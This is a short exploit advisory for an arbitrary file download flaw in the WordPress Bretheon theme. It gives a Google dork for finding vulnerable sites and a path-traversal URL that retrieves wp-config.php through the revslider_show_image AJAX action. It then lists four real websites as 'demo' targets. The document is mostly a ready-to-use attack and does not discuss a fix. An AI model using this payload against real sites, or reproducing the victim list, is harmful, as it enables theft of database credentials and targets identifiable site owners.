WordPress Bretheon theme suffers from an arbitrary file download vulnerability.
14319d94ced2e88f07fb75dde8d7a0af6db0baeddf2e8632f638cb4f4b442ee9
# Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
# Date: 17/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan
# Tested on: Linux / Window
# Google Dork: inurl:wp-content/themes/bretheon/
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#Demo
http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php